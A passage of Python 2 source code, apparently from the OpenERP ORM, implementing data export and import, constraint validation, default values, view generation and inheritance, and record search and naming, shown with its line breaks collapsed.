self._columns[f[i]] elif f[i] in self._inherit_fields.keys(): cols = selection_field(self._inherits) if cols and cols._type == 'selection': sel_list = cols.selection if r and type(sel_list) == type([]): r = [x[1] for x in sel_list if r==x[0]] r = r and r[0] or False if not r: if f[i] in self._columns: r = check_type(self._columns[f[i]]._type) elif f[i] in self._inherit_fields: r = check_type(self._inherit_fields[f[i]][2]._type) data[fpos] = r or False break if isinstance(r, (browse_record_list, list)): first = True fields2 = map(lambda x: (x[:i+1]==f[:i+1] and x[i+1:]) \ or [], fields) if fields2 in done: if [x for x in fields2 if x]: break done.append(fields2) if cols and cols._type=='many2many' and len(fields[fpos])>(i+1) and (fields[fpos][i+1]=='id'): data[fpos] = ','.join([_get_xml_id(self, cr, uid, x) for x in r]) break for row2 in r: lines2 = row2._model.__export_row(cr, uid, row2, fields2, context) if first: for fpos2 in range(len(fields)): if lines2 and lines2[0][fpos2]: data[fpos2] = lines2[0][fpos2] if not data[fpos]: dt = '' for rr in r: name_relation = self.pool.get(rr._table_name)._rec_name if isinstance(rr[name_relation], browse_record): rr = rr[name_relation] rr_name = self.pool.get(rr._table_name).name_get(cr, uid, [rr.id], context=context) rr_name = rr_name and rr_name[0] and rr_name[0][1] or '' dt += tools.ustr(rr_name or '') + ',' data[fpos] = dt[:-1] break lines += lines2[1:] first = False else: lines += lines2 break i += 1 if i == len(f): if isinstance(r, browse_record): r = self.pool.get(r._table_name).name_get(cr, uid, [r.id], context=context) r = r and r[0] and r[0][1] or '' data[fpos] = tools.ustr(r or '') return [data] + lines def export_data(self, cr, uid, ids, fields_to_export, context=None): """ Export fields for selected objects :param cr: database cursor :param uid: current user id :param ids: list of ids :param fields_to_export: list of fields :param context: context arguments, like lang, time zone :rtype: dictionary with a *datas* matrix This method is used when exporting data via client menu """ if context is None: context = {} cols = self._columns.copy() for f in self._inherit_fields: cols.update({f: self._inherit_fields[f][2]}) fields_to_export = map(fix_import_export_id_paths, fields_to_export) datas = [] for row in self.browse(cr, uid, ids, context): datas += self.__export_row(cr, uid, row, fields_to_export, context) return {'datas': datas} def import_data(self, cr, uid, fields, datas, mode='init', current_module='', noupdate=False, context=None, filename=None): """Import given data in given module This method is used when importing data via client menu. Example of fields to import for a sale.order:: .id, (=database_id) partner_id, (=name_search) order_line/.id, (=database_id) order_line/name, order_line/product_id/id, (=xml id) order_line/price_unit, order_line/product_uom_qty, order_line/product_uom/id (=xml_id) This method returns a 4-tuple with the following structure:: (return_code, errored_resource, error_message, unused) * The first item is a return code, it is ``-1`` in case of import error, or the last imported row number in case of success * The second item contains the record data dict that failed to import in case of error, otherwise it's 0 * The third item contains an error message string in case of error, otherwise it's 0 * The last item is currently unused, with no specific semantics :param fields: list of fields to import :param data: data to import :param mode: 'init' or 'update' for record creation :param current_module: module name :param noupdate: flag for record creation :param filename: optional file to store partial import state for recovery :returns: 4-tuple in the form (return_code, errored_resource, error_message, unused) :rtype: (int, dict or 0, str or 0, str or 0) """ if not context: context = {} fields = map(fix_import_export_id_paths, fields) ir_model_data_obj = self.pool.get('ir.model.data') # mode: id (XML id) or .id (database id) or False for name_get def _get_id(model_name, id, current_module=False, mode='id'): if mode=='.id': id = int(id) obj_model = self.pool.get(model_name) ids = obj_model.search(cr, uid, [('id', '=', int(id))]) if not len(ids): raise Exception(_("Database ID doesn't exist: %s : %s") %(model_name, id)) elif mode=='id': if '.' in id: module, xml_id = id.rsplit('.', 1) else: module, xml_id = current_module, id record_id = ir_model_data_obj._get_id(cr, uid, module, xml_id) ir_model_data = ir_model_data_obj.read(cr, uid, [record_id], ['res_id']) if not ir_model_data: raise ValueError('No references to %s.%s' % (module, xml_id)) id = ir_model_data[0]['res_id'] else: obj_model = self.pool.get(model_name) ids = obj_model.name_search(cr, uid, id, operator='=', context=context) if not ids: raise ValueError('No record found for %s' % (id,)) id = ids[0][0] return id # IN: # datas: a list of records, each record is defined by a list of values # prefix: a list of prefix fields ['line_ids'] # position: the line to process, skip is False if it's the first line of the current record # OUT: # (res, position, warning, res_id) with # res: the record for the next line to process (including it's one2many) # position: the new position for the next line # res_id: the ID of the record if it's a modification def process_liness(self, datas, prefix, current_module, model_name, fields_def, position=0, skip=0): line = datas[position] row = {} warning = [] data_res_id = False xml_id = False nbrmax = position+1 done = {} for i, field in enumerate(fields): res = False if i >= len(line): raise Exception(_('Please check that all your lines have %d columns.' 'Stopped around line %d having %d columns.') % \ (len(fields), position+2, len(line))) if not line[i]: continue if field[:len(prefix)] <> prefix: if line[i] and skip: return False continue field_name = field[len(prefix)] #set the mode for m2o, o2m, m2m : xml_id/id/name if len(field) == len(prefix)+1: mode = False else: mode = field[len(prefix)+1] # TODO: improve this by using csv.csv_reader def many_ids(line, relation, current_module, mode): res = [] for db_id in line.split(config.get('csv_internal_sep')): res.append(_get_id(relation, db_id, current_module, mode)) return [(6,0,res)] # ID of the record using a XML ID if field_name == 'id': try: data_res_id = _get_id(model_name, line[i], current_module) except ValueError: pass xml_id = line[i] continue # ID of the record using a database ID elif field_name == '.id': data_res_id = _get_id(model_name, line[i], current_module, '.id') continue field_type = fields_def[field_name]['type'] # recursive call for getting children and returning [(0,0,{})] or [(1,ID,{})] if field_type == 'one2many': if field_name in done: continue done[field_name] = True relation = fields_def[field_name]['relation'] relation_obj = self.pool.get(relation) newfd = relation_obj.fields_get( cr, uid, context=context ) pos = position res = [] first = 0 while pos < len(datas): res2 = process_liness(self, datas, prefix + [field_name], current_module, relation_obj._name, newfd, pos, first) if not res2: break (newrow, pos, w2, data_res_id2, xml_id2) = res2 nbrmax = max(nbrmax, pos) warning += w2 first += 1 if (not newrow) or not reduce(lambda x, y: x or y, newrow.values(), 0): break res.append( (data_res_id2 and 1 or 0, data_res_id2 or 0, newrow) ) elif field_type == 'many2one': relation = fields_def[field_name]['relation'] res = _get_id(relation, line[i], current_module, mode) elif field_type == 'many2many': relation = fields_def[field_name]['relation'] res = many_ids(line[i], relation, current_module, mode) elif field_type == 'integer': res = line[i] and int(line[i]) or 0 elif field_type == 'boolean': res = line[i].lower() not in ('0', 'false', 'off') elif field_type == 'float': res = line[i] and float(line[i]) or 0.0 elif field_type == 'selection': for key, val in fields_def[field_name]['selection']: if tools.ustr(line[i]) in [tools.ustr(key), tools.ustr(val)]: res = key break if line[i] and not res: _logger.warning( _("key '%s' not found in selection field '%s'"), tools.ustr(line[i]), tools.ustr(field_name)) warning.append(_("Key/value '%s' not found in selection field '%s'") % ( tools.ustr(line[i]), tools.ustr(field_name))) else: res = line[i] row[field_name] = res or False return row, nbrmax, warning, data_res_id, xml_id fields_def = self.fields_get(cr, uid, context=context) position = 0 if config.get('import_partial') and filename: with open(config.get('import_partial'), 'rb') as partial_import_file: data = pickle.load(partial_import_file) position = data.get(filename, 0) while position<len(datas): (res, position, warning, res_id, xml_id) = \ process_liness(self, datas, [], current_module, self._name, fields_def, position=position) if len(warning): cr.rollback() return -1, res, 'Line ' + str(position) +' : ' + '!\n'.join(warning), '' try: ir_model_data_obj._update(cr, uid, self._name, current_module, res, mode=mode, xml_id=xml_id, noupdate=noupdate, res_id=res_id, context=context) except Exception, e: return -1, res, 'Line ' + str(position) + ' : ' + tools.ustr(e), '' if config.get('import_partial') and filename and (not (position%100)): with open(config.get('import_partial'), 'rb') as partial_import: data = pickle.load(partial_import) data[filename] = position with open(config.get('import_partial'), 'wb') as partial_import: pickle.dump(data, partial_import) if context.get('defer_parent_store_computation'): self._parent_store_compute(cr) cr.commit() if context.get('defer_parent_store_computation'): self._parent_store_compute(cr) return position, 0, 0, 0 def get_invalid_fields(self, cr, uid): return list(self._invalids) def _validate(self, cr, uid, ids, context=None): context = context or {} lng = context.get('lang', False) or 'en_US' trans = self.pool.get('ir.translation') error_msgs = [] for constraint in self._constraints: fun, msg, fields = constraint if not fun(self, cr, uid, ids): # Check presence of __call__ directly instead of using # callable() because it will be deprecated as of Python 3.0 if hasattr(msg, '__call__'): tmp_msg = msg(self, cr, uid, ids, context=context) if isinstance(tmp_msg, tuple): tmp_msg, params = tmp_msg translated_msg = tmp_msg % params else: translated_msg = tmp_msg else: translated_msg = trans._get_source(cr, uid, self._name, 'constraint', lng, msg) or msg error_msgs.append( _("Error occurred while validating the field(s) %s: %s") % (','.join(fields), translated_msg) ) self._invalids.update(fields) if error_msgs: cr.rollback() raise except_orm('ValidateError', '\n'.join(error_msgs)) else: self._invalids.clear() def default_get(self, cr, uid, fields_list, context=None): """ Returns default values for the fields in fields_list. :param fields_list: list of fields to get the default values for (example ['field1', 'field2',]) :type fields_list: list :param context: optional context dictionary - it may contains keys for specifying certain options like ``context_lang`` (language) or ``context_tz`` (timezone) to alter the results of the call. It may contain keys in the form ``default_XXX`` (where XXX is a field name), to set or override a default value for a field. A special ``bin_size`` boolean flag may also be passed in the context to request the value of all fields.binary columns to be returned as the size of the binary instead of its contents. This can also be selectively overriden by passing a field-specific flag in the form ``bin_size_XXX: True/False`` where ``XXX`` is the name of the field. Note: The ``bin_size_XXX`` form is new in OpenERP v6.0. :return: dictionary of the default values (set on the object model class, through user preferences, or in the context) """ # trigger view init hook self.view_init(cr, uid, fields_list, context) if not context: context = {} defaults = {} # get the default values for the inherited fields for t in self._inherits.keys(): defaults.update(self.pool.get(t).default_get(cr, uid, fields_list, context)) # get the default values defined in the object for f in fields_list: if f in self._defaults: if callable(self._defaults[f]): defaults[f] = self._defaults[f](self, cr, uid, context) else: defaults[f] = self._defaults[f] fld_def = ((f in self._columns) and self._columns[f]) \ or ((f in self._inherit_fields) and self._inherit_fields[f][2]) \ or False if isinstance(fld_def, fields.property): property_obj = self.pool.get('ir.property') prop_value = property_obj.get(cr, uid, f, self._name, context=context) if prop_value: if isinstance(prop_value, (browse_record, browse_null)): defaults[f] = prop_value.id else: defaults[f] = prop_value else: if f not in defaults: defaults[f] = False # get the default values set by the user and override the default # values defined in the object ir_values_obj = self.pool.get('ir.values') res = ir_values_obj.get(cr, uid, 'default', False, [self._name]) for id, field, field_value in res: if field in fields_list: fld_def = (field in self._columns) and self._columns[field] or self._inherit_fields[field][2] if fld_def._type in ('many2one', 'one2one'): obj = self.pool.get(fld_def._obj) if not obj.search(cr, uid, [('id', '=', field_value or False)]): continue if fld_def._type in ('many2many'): obj = self.pool.get(fld_def._obj) field_value2 = [] for i in range(len(field_value)): if not obj.search(cr, uid, [('id', '=', field_value[i])]): continue field_value2.append(field_value[i]) field_value = field_value2 if fld_def._type in ('one2many'): obj = self.pool.get(fld_def._obj) field_value2 = [] for i in range(len(field_value)): field_value2.append({}) for field2 in field_value[i]: if field2 in obj._columns.keys() and obj._columns[field2]._type in ('many2one', 'one2one'): obj2 = self.pool.get(obj._columns[field2]._obj) if not obj2.search(cr, uid, [('id', '=', field_value[i][field2])]): continue elif field2 in obj._inherit_fields.keys() and obj._inherit_fields[field2][2]._type in ('many2one', 'one2one'): obj2 = self.pool.get(obj._inherit_fields[field2][2]._obj) if not obj2.search(cr, uid, [('id', '=', field_value[i][field2])]): continue # TODO add test for many2many and one2many field_value2[i][field2] = field_value[i][field2] field_value = field_value2 defaults[field] = field_value # get the default values from the context for key in context or {}: if key.startswith('default_') and (key[8:] in fields_list): defaults[key[8:]] = context[key] return defaults def fields_get_keys(self, cr, user, context=None): res = self._columns.keys() # TODO I believe this loop can be replace by # res.extend(self._inherit_fields.key()) for parent in self._inherits: res.extend(self.pool.get(parent).fields_get_keys(cr, user, context)) return res # # Overload this method if you need a window title which depends on the context # def view_header_get(self, cr, user, view_id=None, view_type='form', context=None): return False def __view_look_dom(self, cr, user, node, view_id, in_tree_view, model_fields, context=None): """ Return the description of the fields in the node. In a normal call to this method, node is a complete view architecture but it is actually possible to give some sub-node (this is used so that the method can call itself recursively). Originally, the field descriptions are drawn from the node itself. But there is now some code calling fields_get() in order to merge some of those information in the architecture. """ if context is None: context = {} result = False fields = {} children = True modifiers = {} def encode(s): if isinstance(s, unicode): return s.encode('utf8') return s def check_group(node): """ Set invisible to true if the user is not in the specified groups. """ if node.get('groups'): groups = node.get('groups').split(',') ir_model_access = self.pool.get('ir.model.access') can_see = any(ir_model_access.check_groups(cr, user, group) for group in groups) if not can_see: node.set('invisible', '1') modifiers['invisible'] = True if 'attrs' in node.attrib: del(node.attrib['attrs']) #avoid making field visible later del(node.attrib['groups']) if node.tag in ('field', 'node', 'arrow'): if node.get('object'): attrs = {} views = {} xml = "<form>" for f in node: if f.tag in ('field'): xml += etree.tostring(f, encoding="utf-8") xml += "</form>" new_xml = etree.fromstring(encode(xml)) ctx = context.copy() ctx['base_model_name'] = self._name xarch, xfields = self.pool.get(node.get('object')).__view_look_dom_arch(cr, user, new_xml, view_id, ctx) views['form'] = { 'arch': xarch, 'fields': xfields } attrs = {'views': views} fields = xfields if node.get('name'): attrs = {} try: if node.get('name') in self._columns: column = self._columns[node.get('name')] else: column = self._inherit_fields[node.get('name')][2] except Exception: column = False if column: relation = self.pool.get(column._obj) children = False views = {} for f in node: if f.tag in ('form', 'tree', 'graph'): node.remove(f) ctx = context.copy() ctx['base_model_name'] = self._name xarch, xfields = relation.__view_look_dom_arch(cr, user, f, view_id, ctx) views[str(f.tag)] = { 'arch': xarch, 'fields': xfields } attrs = {'views': views} if node.get('widget') and node.get('widget') == 'selection': # Prepare the cached selection list for the client. This needs to be # done even when the field is invisible to the current user, because # other events could need to change its value to any of the selectable ones # (such as on_change events, refreshes, etc.) # If domain and context are strings, we keep them for client-side, otherwise # we evaluate them server-side to consider them when generating the list of # possible values # TODO: find a way to remove this hack, by allow dynamic domains dom = [] if column._domain and not isinstance(column._domain, basestring): dom = column._domain dom = dom + eval(node.get('domain', '[]'), {'uid': user, 'time': time}) search_context = dict(context) if column._context and not isinstance(column._context, basestring): search_context.update(column._context) attrs['selection'] = relation._name_search(cr, user, '', dom, context=search_context, limit=None, name_get_uid=1) if (node.get('required') and not int(node.get('required'))) or not column.required: attrs['selection'].append((False, '')) fields[node.get('name')] = attrs field = model_fields.get(node.get('name')) if field: transfer_field_to_modifiers(field, modifiers) elif node.tag in ('form', 'tree'): result = self.view_header_get(cr, user, False, node.tag, context) if result: node.set('string', result) in_tree_view = node.tag == 'tree' elif node.tag == 'calendar': for additional_field in ('date_start', 'date_delay', 'date_stop', 'color'): if node.get(additional_field): fields[node.get(additional_field)] = {} check_group(node) # The view architeture overrides the python model. # Get the attrs before they are (possibly) deleted by check_group below transfer_node_to_modifiers(node, modifiers, context, in_tree_view) # TODO remove attrs couterpart in modifiers when invisible is true ? # translate view if 'lang' in context: if node.get('string') and not result: trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('string')) if trans == node.get('string') and ('base_model_name' in context): # If translation is same as source, perhaps we'd have more luck with the alternative model name # (in case we are in a mixed situation, such as an inherited view where parent_view.model != model trans = self.pool.get('ir.translation')._get_source(cr, user, context['base_model_name'], 'view', context['lang'], node.get('string')) if trans: node.set('string', trans) if node.get('confirm'): trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('confirm')) if trans: node.set('confirm', trans) if node.get('sum'): trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('sum')) if trans: node.set('sum', trans) if node.get('avg'): trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('avg')) if trans: node.set('avg', trans) if node.get('help'): trans = self.pool.get('ir.translation')._get_source(cr, user, self._name, 'view', context['lang'], node.get('help')) if trans: node.set('help', trans) for f in node: if children or (node.tag == 'field' and f.tag in ('filter','separator')): fields.update(self.__view_look_dom(cr, user, f, view_id, in_tree_view, model_fields, context)) transfer_modifiers_to_node(modifiers, node) return fields def _disable_workflow_buttons(self, cr, user, node): """ Set the buttons in node to readonly if the user can't activate them. """ if user == 1: # admin user can always activate workflow buttons return node # TODO handle the case of more than one workflow for a model or multiple # transitions with different groups and same signal usersobj = self.pool.get('res.users') buttons = (n for n in node.getiterator('button') if n.get('type') != 'object') for button in buttons: user_groups = usersobj.read(cr, user, [user], ['groups_id'])[0]['groups_id'] cr.execute("""SELECT DISTINCT t.group_id FROM wkf INNER JOIN wkf_activity a ON a.wkf_id = wkf.id INNER JOIN wkf_transition t ON (t.act_to = a.id) WHERE wkf.osv = %s AND t.signal = %s AND t.group_id is NOT NULL """, (self._name, button.get('name'))) group_ids = [x[0] for x in cr.fetchall() if x[0]] can_click = not group_ids or bool(set(user_groups).intersection(group_ids)) button.set('readonly', str(int(not can_click))) return node def __view_look_dom_arch(self, cr, user, node, view_id, context=None): """ Return an architecture and a description of all the fields. The field description combines the result of fields_get() and __view_look_dom(). :param node: the architecture as as an etree :return: a tuple (arch, fields) where arch is the given node as a string and fields is the description of all the fields. """ fields = {} if node.tag == 'diagram': if node.getchildren()[0].tag == 'node': node_fields = self.pool.get(node.getchildren()[0].get('object')).fields_get(cr, user, None, context) fields.update(node_fields) if node.getchildren()[1].tag == 'arrow': arrow_fields = self.pool.get(node.getchildren()[1].get('object')).fields_get(cr, user, None, context) fields.update(arrow_fields) else: fields = self.fields_get(cr, user, None, context) fields_def = self.__view_look_dom(cr, user, node, view_id, False, fields, context=context) node = self._disable_workflow_buttons(cr, user, node) arch = etree.tostring(node, encoding="utf-8").replace('\t', '') for k in fields.keys(): if k not in fields_def: del fields[k] for field in fields_def: if field == 'id': # sometime, the view may contain the (invisible) field 'id' needed for a domain (when 2 objects have cross references) fields['id'] = {'readonly': True, 'type': 'integer', 'string': 'ID'} elif field in fields: fields[field].update(fields_def[field]) else: cr.execute('select name, model from ir_ui_view where (id=%s or inherit_id=%s) and arch like %s', (view_id, view_id, '%%%s%%' % field)) res = cr.fetchall()[:] model = res[0][1] res.insert(0, ("Can't find field '%s' in the following view parts composing the view of object model '%s':" % (field, model), None)) msg = "\n * ".join([r[0] for r in res]) msg += "\n\nEither you wrongly customized this view, or some modules bringing those views are not compatible with your current data model" _logger.error(msg) raise except_orm('View error', msg) return arch, fields def _get_default_form_view(self, cr, user, context=None): """ Generates a default single-line form view using all fields of the current model except the m2m and o2m ones. :param cr: database cursor :param int user: user id :param dict context: connection context :returns: a form view as an lxml document :rtype: etree._Element """ view = etree.Element('form', string=self._description) # TODO it seems fields_get can be replaced by _all_columns (no need for translation) for field, descriptor in self.fields_get(cr, user, context=context).iteritems(): if descriptor['type'] in ('one2many', 'many2many'): continue etree.SubElement(view, 'field', name=field) if descriptor['type'] == 'text': etree.SubElement(view, 'newline') return view def _get_default_tree_view(self, cr, user, context=None): """ Generates a single-field tree view, using _rec_name if it's one of the columns or the first column it finds otherwise :param cr: database cursor :param int user: user id :param dict context: connection context :returns: a tree view as an lxml document :rtype: etree._Element """ _rec_name = self._rec_name if _rec_name not in self._columns: _rec_name = self._columns.keys()[0] if len(self._columns.keys()) > 0 else "id" view = etree.Element('tree', string=self._description) etree.SubElement(view, 'field', name=_rec_name) return view def _get_default_calendar_view(self, cr, user, context=None): """ Generates a default calendar view by trying to infer calendar fields from a number of pre-set attribute names :param cr: database cursor :param int user: user id :param dict context: connection context :returns: a calendar view :rtype: etree._Element """ def set_first_of(seq, in_, to): """Sets the first value of ``seq`` also found in ``in_`` to the ``to`` attribute of the view being closed over. Returns whether it's found a suitable value (and set it on the attribute) or not """ for item in seq: if item in in_: view.set(to, item) return True return False view = etree.Element('calendar', string=self._description) etree.SubElement(view, 'field', name=self._rec_name) if (self._date_name not in self._columns): date_found = False for dt in ['date', 'date_start', 'x_date', 'x_date_start']: if dt in self._columns: self._date_name = dt date_found = True break if not date_found: raise except_orm(_('Invalid Object Architecture!'), _("Insufficient fields for Calendar View!")) view.set('date_start', self._date_name) set_first_of(["user_id", "partner_id", "x_user_id", "x_partner_id"], self._columns, 'color') if not set_first_of(["date_stop", "date_end", "x_date_stop", "x_date_end"], self._columns, 'date_stop'): if not set_first_of(["date_delay", "planned_hours", "x_date_delay", "x_planned_hours"], self._columns, 'date_delay'): raise except_orm( _('Invalid Object Architecture!'), _("Insufficient fields to generate a Calendar View for %s, missing a date_stop or a date_delay" % (self._name))) return view def _get_default_search_view(self, cr, uid, context=None): """ :param cr: database cursor :param int user: user id :param dict context: connection context :returns: an lxml document of the view :rtype: etree._Element """ form_view = self.fields_view_get(cr, uid, False, 'form', context=context) tree_view = self.fields_view_get(cr, uid, False, 'tree', context=context) # TODO it seems _all_columns could be used instead of fields_get (no need for translated fields info) fields = self.fields_get(cr, uid, context=context) fields_to_search = set( field for field, descriptor in fields.iteritems() if descriptor.get('select')) for view in (form_view, tree_view): view_root = etree.fromstring(view['arch']) # Only care about select=1 in xpath below, because select=2 is covered # by the custom advanced search in clients fields_to_search.update(view_root.xpath("//field[@select=1]/@name")) tree_view_root = view_root # as provided by loop above search_view = etree.Element("search", string=tree_view_root.get("string", "")) field_group = etree.SubElement(search_view, "group") for field_name in fields_to_search: etree.SubElement(field_group, "field", name=field_name) return search_view # # if view_id, view_type is not required # def fields_view_get(self, cr, user, view_id=None, view_type='form', context=None, toolbar=False, submenu=False): """ Get the detailed composition of the requested view like fields, model, view architecture :param cr: database cursor :param user: current user id :param view_id: id of the view or None :param view_type: type of the view to return if view_id is None ('form', tree', ...) :param context: context arguments, like lang, time zone :param toolbar: true to include contextual actions :param submenu: deprecated :return: dictionary describing the composition of the requested view (including inherited views and extensions) :raise AttributeError: * if the inherited view has unknown position to work with other than 'before', 'after', 'inside', 'replace' * if some tag other than 'position' is found in parent view :raise Invalid ArchitectureError: if there is view type other than form, tree, calendar, search etc defined on the structure """ if context is None: context = {} def encode(s): if isinstance(s, unicode): return s.encode('utf8') return s def raise_view_error(error_msg, child_view_id): view, child_view = self.pool.get('ir.ui.view').browse(cr, user, [view_id, child_view_id], context) raise AttributeError("View definition error for inherited view '%s' on model '%s': %s" % (child_view.xml_id, self._name, error_msg)) def locate(source, spec): """ Locate a node in a source (parent) architecture. Given a complete source (parent) architecture (i.e. the field `arch` in a view), and a 'spec' node (a node in an inheriting view that specifies the location in the source view of what should be changed), return (if it exists) the node in the source view matching the specification. :param source: a parent architecture to modify :param spec: a modifying node in an inheriting view :return: a node in the source matching the spec """ if spec.tag == 'xpath': nodes = source.xpath(spec.get('expr')) return nodes[0] if nodes else None elif spec.tag == 'field': # Only compare the field name: a field can be only once in a given view # at a given level (and for multilevel expressions, we should use xpath # inheritance spec anyway). for node in source.getiterator('field'): if node.get('name') == spec.get('name'): return node return None else: for node in source.getiterator(spec.tag): good = True for attr in spec.attrib: if attr != 'position' and (not node.get(attr) or node.get(attr) != spec.get(attr)): good = False break if good: return node return None def apply_inheritance_specs(source, specs_arch, inherit_id=None): """ Apply an inheriting view. Apply to a source architecture all the spec nodes (i.e. nodes describing where and what changes to apply to some parent architecture) given by an inheriting view. :param source: a parent architecture to modify :param specs_arch: a modifying architecture in an inheriting view :param inherit_id: the database id of the inheriting view :return: a modified source where the specs are applied """ specs_tree = etree.fromstring(encode(specs_arch)) # Queue of specification nodes (i.e. nodes describing where and # changes to apply to some parent architecture). specs = [specs_tree] while len(specs): spec = specs.pop(0) if isinstance(spec, SKIPPED_ELEMENT_TYPES): continue if spec.tag == 'data': specs += [ c for c in specs_tree ] continue node = locate(source, spec) if node is not None: pos = spec.get('position', 'inside') if pos == 'replace': if node.getparent() is None: source = copy.deepcopy(spec[0]) else: for child in spec: node.addprevious(child) node.getparent().remove(node) elif pos == 'attributes': for child in spec.getiterator('attribute'): attribute = (child.get('name'), child.text and child.text.encode('utf8') or None) if attribute[1]: node.set(attribute[0], attribute[1]) else: del(node.attrib[attribute[0]]) else: sib = node.getnext() for child in spec: if pos == 'inside': node.append(child) elif pos == 'after': if sib is None: node.addnext(child) node = child else: sib.addprevious(child) elif pos == 'before': node.addprevious(child) else: raise_view_error("Invalid position value: '%s'" % pos, inherit_id) else: attrs = ''.join([ ' %s="%s"' % (attr, spec.get(attr)) for attr in spec.attrib if attr != 'position' ]) tag = "<%s%s>" % (spec.tag, attrs) raise_view_error("Element '%s' not found in parent view '%%(parent_xml_id)s'" % tag, inherit_id) return source def apply_view_inheritance(cr, user, source, inherit_id): """ Apply all the (directly and indirectly) inheriting views. :param source: a parent architecture to modify (with parent modifications already applied) :param inherit_id: the database view_id of the parent view :return: a modified source where all the modifying architecture are applied """ sql_inherit = self.pool.get('ir.ui.view').get_inheriting_views_arch(cr, user, inherit_id, self._name) for (view_arch, view_id) in sql_inherit: source = apply_inheritance_specs(source, view_arch, view_id) source = apply_view_inheritance(cr, user, source, view_id) return source result = {'type': view_type, 'model': self._name} sql_res = False parent_view_model = None view_ref = context.get(view_type + '_view_ref') # Search for a root (i.e. without any parent) view. while True: if view_ref and not view_id: if '.' in view_ref: module, view_ref = view_ref.split('.', 1) cr.execute("SELECT res_id FROM ir_model_data WHERE model='ir.ui.view' AND module=%s AND name=%s", (module, view_ref)) view_ref_res = cr.fetchone() if view_ref_res: view_id = view_ref_res[0] if view_id: cr.execute("""SELECT arch,name,field_parent,id,type,inherit_id,model FROM ir_ui_view WHERE id=%s""", (view_id,)) else: cr.execute("""SELECT arch,name,field_parent,id,type,inherit_id,model FROM ir_ui_view WHERE model=%s AND type=%s AND inherit_id IS NULL ORDER BY priority""", (self._name, view_type)) sql_res = cr.dictfetchone() if not sql_res: break view_id = sql_res['inherit_id'] or sql_res['id'] parent_view_model = sql_res['model'] if not sql_res['inherit_id']: break # if a view was found if sql_res: source = etree.fromstring(encode(sql_res['arch'])) result.update( arch=apply_view_inheritance(cr, user, source, sql_res['id']), type=sql_res['type'], view_id=sql_res['id'], name=sql_res['name'], field_parent=sql_res['field_parent'] or False) else: # otherwise, build some kind of default view try: view = getattr(self, '_get_default_%s_view' % view_type)( cr, user, context) except AttributeError: # what happens here, graph case? raise except_orm(_('Invalid Architecture!'), _("There is no view of type '%s' defined for the structure!") % view_type) result.update( arch=view, name='default', field_parent=False, view_id=0) if parent_view_model != self._name: ctx = context.copy() ctx['base_model_name'] = parent_view_model else: ctx = context xarch, xfields = self.__view_look_dom_arch(cr, user, result['arch'], view_id, context=ctx) result['arch'] = xarch result['fields'] = xfields if toolbar: def clean(x): x = x[2] for key in ('report_sxw_content', 'report_rml_content', 'report_sxw', 'report_rml', 'report_sxw_content_data', 'report_rml_content_data'): if key in x: del x[key] return x ir_values_obj = self.pool.get('ir.values') resprint = ir_values_obj.get(cr, user, 'action', 'client_print_multi', [(self._name, False)], False, context) resaction = ir_values_obj.get(cr, user, 'action', 'client_action_multi', [(self._name, False)], False, context) resrelate = ir_values_obj.get(cr, user, 'action', 'client_action_relate', [(self._name, False)], False, context) resaction = [clean(action) for action in resaction if view_type == 'tree' or not action[2].get('multi')] resprint = [clean(print_) for print_ in resprint if view_type == 'tree' or not print_[2].get('multi')] resrelate = map(lambda x: x[2], resrelate) for x in itertools.chain(resprint, resaction, resrelate): x['string'] = x['name'] result['toolbar'] = { 'print': resprint, 'action': resaction, 'relate': resrelate } return result _view_look_dom_arch = __view_look_dom_arch def search_count(self, cr, user, args, context=None): if not context: context = {} res = self.search(cr, user, args, context=context, count=True) if isinstance(res, list): return len(res) return res def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False): """ Search for records based on a search domain. :param cr: database cursor :param user: current user id :param args: list of tuples specifying the search domain [('field_name', 'operator', value), ...]. Pass an empty list to match all records. :param offset: optional number of results to skip in the returned values (default: 0) :param limit: optional max number of records to return (default: **None**) :param order: optional columns to sort by (default: self._order=id ) :param context: optional context arguments, like lang, time zone :type context: dictionary :param count: optional (default: **False**), if **True**, returns only the number of records matching the criteria, not their ids :return: id or list of ids of records matching the criteria :rtype: integer or list of integers :raise AccessError: * if user tries to bypass access rules for read on the requested object. **Expressing a search domain (args)** Each tuple in the search domain needs to have 3 elements, in the form: **('field_name', 'operator', value)**, where: * **field_name** must be a valid name of field of the object model, possibly following many-to-one relationships using dot-notation, e.g 'street' or 'partner_id.country' are valid values. * **operator** must be a string with a valid comparison operator from this list: ``=, !=, >, >=, <, <=, like, ilike, in, not in, child_of, parent_left, parent_right`` The semantics of most of these operators are obvious. The ``child_of`` operator will look for records who are children or grand-children of a given record, according to the semantics of this model (i.e following the relationship field named by ``self._parent_name``, by default ``parent_id``. * **value** must be a valid value to compare with the values of **field_name**, depending on its type. Domain criteria can be combined using 3 logical operators than can be added between tuples: '**&**' (logical AND, default), '**|**' (logical OR), '**!**' (logical NOT). These are **prefix** operators and the arity of the '**&**' and '**|**' operator is 2, while the arity of the '**!**' is just 1. Be very careful about this when you combine them the first time. Here is an example of searching for Partners named *ABC* from Belgium and Germany whose language is not english :: [('name','=','ABC'),'!',('language.code','=','en_US'),'|',('country_id.code','=','be'),('country_id.code','=','de')) The '&' is omitted as it is the default, and of course we could have used '!=' for the language, but what this domain really represents is:: (name is 'ABC' AND (language is NOT english) AND (country is Belgium OR Germany)) """ return self._search(cr, user, args, offset=offset, limit=limit, order=order, context=context, count=count) def name_get(self, cr, user, ids, context=None): """Returns the preferred display value (text representation) for the records with the given ``ids``. By default this will be the value of the ``name`` column, unless the model implements a custom behavior. Can sometimes be seen as the inverse function of :meth:`~.name_search`, but it is not guaranteed to be. :rtype: list(tuple) :return: list of pairs ``(id,text_repr)`` for all records with the given ``ids``. """ if not ids: return [] if isinstance(ids, (int, long)): ids = [ids] return [(r['id'], tools.ustr(r[self._rec_name])) for r in self.read(cr, user, ids, [self._rec_name], context, load='_classic_write')] def name_search(self, cr, user, name='', args=None, operator='ilike', context=None, limit=100): """Search for records that have a display name matching the given ``name`` pattern if compared with the given ``operator``, while also matching the optional search domain (``args``). This is used for example to provide suggestions based on a partial value for a relational field. Sometimes be seen as the inverse function of :meth:`~.name_get`, but it is not guaranteed to be. This method is equivalent to calling :meth:`~.search` with a search domain based on ``name`` and then :meth:`~.name_get` on the result of the search. :param list 